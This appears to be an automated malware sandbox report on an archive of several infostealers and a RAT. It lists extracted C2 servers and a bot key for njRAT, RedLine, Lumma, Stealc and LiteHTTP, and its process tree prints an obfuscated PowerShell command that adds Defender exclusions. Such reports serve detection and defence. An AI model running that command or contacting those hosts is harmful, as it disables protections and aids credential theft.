Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://temp.sh/YwuNP...

windows10-2004-x64

http://temp.sh/YwuNP...

windows10-ltsc 2021-x64

http://temp.sh/YwuNP...

windows11-21h2-x64

10

Analysis

  • max time kernel
    240s
  • max time network
    264s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07/03/2025, 22:56

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    http://temp.sh/YwuNP/another_trash_malware.zip

Score
10/10
litehttplummanjratredlinestealcvidarlivetraffocpaketrenobotcollectioncredential_accessdefense_evasiondiscoverydropperexecutioninfostealerpersistenceprivilege_escalationspywarestealertrojan

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

pakEt

C2

condition-clearance.gl.at.ply.gg:7070

Mutex

9d3a575fdcc2dd1782d18ac5655a8b28

Attributes
  • reg_key

    9d3a575fdcc2dd1782d18ac5655a8b28

  • splitter

    |'|'|

Extracted

Family

redline

Botnet

LiveTraffoc

C2

4.185.56.82:42687

Extracted

Family

lumma

C2

https://calmingtefxtures.run/api

https://foresctwhispers.top/api

https://htracnquilforest.life/api

https://presentymusse.world/api

https://deaddereaste.today/api

https://subawhipnator.life/api

https://privileggoe.live/api

https://boltetuurked.digital/api

https://pastedeputten.life/api

https://garisechairedd.shop/api

https://begindecafer.world/api

https://garagedrootz.top/api

https://0modelshiverd.icu/api

https://arisechairedd.shop/api

https://catterjur.run/api

https://orangemyther.live/api

https://fostinjec.today/api

https://sterpickced.digital/api

https://nebdulaq.digital/api

https://modelshiverd.icu/api

Extracted

Family

stealc

Botnet

reno

C2

http://185.215.113.115

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

lumma

C2

https://moderzysics.top/api

Signatures

  • Detect Vidar Stealer 1 IoCs
    stealer
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

    stealerbotlitehttp
  • Litehttp family
    litehttp
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

    stealerlumma
  • Lumma family
    lumma
  • Njrat family
    njrat
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 1 IoCs
  • Redline family
    redline
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Using powershell.exe command.

    execution
  • Download via BitsAdmin 1 TTPs 3 IoCs
    dropper
  • Downloads MZ/PE file 16 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    defense_evasion
  • Uses browser remote debugging 2 TTPs 19 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 59 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

    spywarestealer
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses Microsoft Outlook profiles 1 TTPs 42 IoCs
    collection
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 15 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 40 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 27 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
    defense_evasionspywaretrojan
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "http://temp.sh/YwuNP/another_trash_malware.zip"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4600
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://temp.sh/YwuNP/another_trash_malware.zip
      2⤵
      • Checks processor information in registry
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4276
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1852 -prefMapHandle 1832 -prefsLen 27359 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {21f4e2d1-d612-41a4-8f65-780d9d47091f} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" gpu
        3⤵
          PID:3184
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2412 -prefsLen 28279 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8fe4179b-1fb5-4ccd-bbbf-9c4d487dfb02} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" socket
          3⤵
          • Checks processor information in registry
          PID:3628
        • C:\Program Files\Mozilla Firefox\firefox.exe
          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1348 -childID 1 -isForBrowser -prefsHandle 3456 -prefMapHandle 2944 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3c352d3d-48f1-42c0-b8bc-a86c5cd3433b} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
          3⤵
            PID:3076
          • C:\Program Files\Mozilla Firefox\firefox.exe
            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2660 -childID 2 -isForBrowser -prefsHandle 4004 -prefMapHandle 4000 -prefsLen 32769 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {860bbd61-113c-4289-ba1c-bac42f5e4c45} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
            3⤵
              PID:552
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4696 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4728 -prefMapHandle 4724 -prefsLen 32769 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8d94d30e-8dfd-41cf-9a98-d9d01bfb35c8} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" utility
              3⤵
              • Checks processor information in registry
              PID:1732
            • C:\Program Files\Mozilla Firefox\firefox.exe
              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5296 -childID 3 -isForBrowser -prefsHandle 5288 -prefMapHandle 5300 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1b4f7ccc-b350-4e27-9f41-c0a3965ca1bb} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
              3⤵
                PID:4916
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5432 -childID 4 -isForBrowser -prefsHandle 5436 -prefMapHandle 5440 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c8dc21b-640c-420a-adb1-868b95be8bb5} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
                3⤵
                  PID:1544
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 5 -isForBrowser -prefsHandle 5724 -prefMapHandle 5720 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5323ed68-045c-4d8c-9e76-4f1483a8b61b} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
                  3⤵
                    PID:1104
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5944 -childID 6 -isForBrowser -prefsHandle 3144 -prefMapHandle 3020 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 944 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52b1fd72-18bd-4a8e-9973-da05ba51d444} 4276 "\\.\pipe\gecko-crash-server-pipe.4276" tab
                    3⤵
                      PID:3200
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  1⤵
                    PID:5032
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe"
                      2⤵
                      • Checks processor information in registry
                      • Modifies registry class
                      • NTFS ADS
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of SetWindowsHookEx
                      PID:1080
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2020 -parentBuildID 20240401114208 -prefsHandle 1940 -prefMapHandle 1932 -prefsLen 31362 -prefMapSize 245184 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0efc8260-a435-46e0-a771-916b83dc2447} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" gpu
                        3⤵
                          PID:356
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2428 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 31240 -prefMapSize 245184 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8425d45-269c-413c-ac85-6d14478debfa} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" socket
                          3⤵
                          • Checks processor information in registry
                          PID:5732
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3304 -childID 1 -isForBrowser -prefsHandle 3244 -prefMapHandle 3280 -prefsLen 25724 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {99be7307-528a-414d-b6f4-b99b4b021415} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                          3⤵
                            PID:2968
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3808 -childID 2 -isForBrowser -prefsHandle 3712 -prefMapHandle 3708 -prefsLen 36614 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5fd3942b-03af-4cb0-ba19-08b9b41124b3} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                            3⤵
                              PID:2704
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4980 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 3968 -prefMapHandle 4088 -prefsLen 36826 -prefMapSize 245184 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8799487f-5687-4106-8958-6f6feb8715c9} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" utility
                              3⤵
                              • Checks processor information in registry
                              PID:5616
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5420 -childID 3 -isForBrowser -prefsHandle 5408 -prefMapHandle 5224 -prefsLen 30118 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f71ed8ca-61d7-4610-8d06-1ed9195ab7db} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                              3⤵
                                PID:4772
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5436 -childID 4 -isForBrowser -prefsHandle 5428 -prefMapHandle 5424 -prefsLen 30118 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38e651de-397d-405c-8eb1-56593bb5047f} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                                3⤵
                                  PID:4552
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5764 -childID 5 -isForBrowser -prefsHandle 5608 -prefMapHandle 5788 -prefsLen 30118 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d31eda2b-f16b-4370-987f-caf6af02a3e8} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                                  3⤵
                                    PID:3428
                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -childID 6 -isForBrowser -prefsHandle 5884 -prefMapHandle 5952 -prefsLen 30280 -prefMapSize 245184 -jsInitHandle 1224 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {de4fdc14-11f8-48ef-9f89-2d6521d17f9f} 1080 "\\.\pipe\gecko-crash-server-pipe.1080" tab
                                    3⤵
                                      PID:60
                                • C:\Program Files\7-Zip\7zG.exe
                                  "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\another_trash_malware\" -spe -an -ai#7zMap12103:104:7zEvent22882
                                  1⤵
                                  • Suspicious use of AdjustPrivilegeToken
                                  • Suspicious use of FindShellTrayWindow
                                  PID:1524
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:1252
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\another_trash_malware\another trash malware\pc fucker.bat" "
                                    1⤵
                                      PID:4268
                                      • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\random.exe
                                        random.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:3768
                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          PID:1284
                                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:4536
                                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1944
                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3956
                                      • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\random.exe
                                        random.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:5932
                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          PID:4768
                                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:5172
                                          • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:3628
                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5748
                                      • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\random.exe
                                        random.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:5224
                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\C4O51.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\C4O51.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          PID:4496
                                          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1J19x2.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1J19x2.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • System Location Discovery: System Language Discovery
                                            PID:5872
                                          • C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2N2602.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2N2602.exe
                                            4⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1640
                                        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P97i.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3P97i.exe
                                          3⤵
                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                          • Checks BIOS information in registry
                                          • Executes dropped EXE
                                          • Identifies Wine through registry keys
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • System Location Discovery: System Language Discovery
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5352
                                      • C:\Users\Admin\Downloads\another_trash_malware\another trash malware\random.exe
                                        random.exe
                                        2⤵
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • System Location Discovery: System Language Discovery
                                        PID:2964
                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Adds Run key to start application
                                          • System Location Discovery: System Language Discovery
                                          PID:6072
                                          • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J19x2.exe
                                            C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1J19x2.exe
                                            4⤵
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of FindShellTrayWindow
                                            PID:3508
                                            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                              5⤵
                                              • Downloads MZ/PE file
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              • Modifies registry class
                                              PID:5400
                                              • C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • System Location Discovery: System Language Discovery
                                                PID:3104
                                                • C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\10126920101\V0Bt74c.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:5500
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3104 -s 972
                                                  7⤵
                                                  • Program crash
                                                  PID:3572
                                              • C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10127580101\mIrI3a9.exe"
                                                6⤵
                                                • Downloads MZ/PE file
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2248
                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 -c ".([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionPath ([Char]67+[Char]58+[Char]92);.([char]65+[char]100+[char]100+[char]45+[char]77+[char]112+[char]80+[char]114+[char]101+[char]102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101) -ExclusionExtension 'exe'"
                                                  7⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:948
                                                • C:\Users\Admin\AppData\Roaming\a.exe
                                                  "C:\Users\Admin\AppData\Roaming\a.exe"
                                                  7⤵
                                                  • Downloads MZ/PE file
                                                  • Executes dropped EXE
                                                  • Accesses Microsoft Outlook profiles
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • outlook_office_path
                                                  • outlook_win_path
                                                  PID:6088
                                                  • C:\Users\Admin\AppData\Local\Temp\Qkimgsxzy.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\Qkimgsxzy.exe"
                                                    8⤵
                                                    • Checks computer location settings
                                                    • Executes dropped EXE
                                                    • Adds Run key to start application
                                                    • Suspicious use of SetThreadContext
                                                    • System Location Discovery: System Language Discovery
                                                    PID:4580
                                                    • C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Vhbyv.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      PID:6384
                                                    • C:\Users\Admin\AppData\Local\Temp\Qkimgsxzy.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\Qkimgsxzy.exe"
                                                      9⤵
                                                      • Executes dropped EXE
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: AddClipboardFormatListener
                                                      PID:7076
                                              • C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10127820101\sqVWjvh.exe"
                                                6⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                PID:2708
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  • Drops file in Windows directory
                                                  • Enumerates system info in registry
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:5184
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
